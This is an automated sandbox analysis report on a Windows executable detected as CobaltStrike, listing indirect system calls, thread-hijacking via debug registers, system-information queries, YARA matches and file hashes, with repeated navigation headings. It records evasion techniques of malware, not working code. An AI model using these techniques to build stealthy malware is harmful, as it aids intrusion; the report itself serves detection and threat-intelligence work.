Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtAllocateVirtualMemory: Indirect: 0x1FC0185	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtCreateThreadEx: Indirect: 0x20A6602	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A6953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtResumeThread: Indirect: 0x20A66ED	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSuspendThread: Indirect: 0x20A4E8C	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A3D44	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A66D8	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtCreateThreadEx: Indirect: 0x20A686D	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtAllocateVirtualMemory: Indirect: 0x1FC0249	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtProtectVirtualMemory: Indirect: 0x1FC0887	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Thread register set: 6516 40

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

0_2_00000001402009C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

0_2_00000001402009C0

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: try_get_function,GetLocaleInfoW,

0_2_00000001401EFFE4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401F0068 try_get_function,GetSystemTimeAsFileTime,

0_2_00000001401F0068

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,

0_2_0000000140054158

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR

ID:	1428763
Product:	CloudBasic
Start time:	15:30:12
Start date:	19.04.2024
Sample:	SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c720c50306558112b389ef44cff494f1
SHA1:	476f36c3f3a3aa0141b481fb683d3c0cbd767def
SHA256:	6b655ddf0b5cda5d24b62d2f387e0f83e57b7a931f55f49ad274b002c1a68b23
Filetype:	Win64 Executable GUI (202006/5) 92.65%

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Malware Threat Intel
Provided by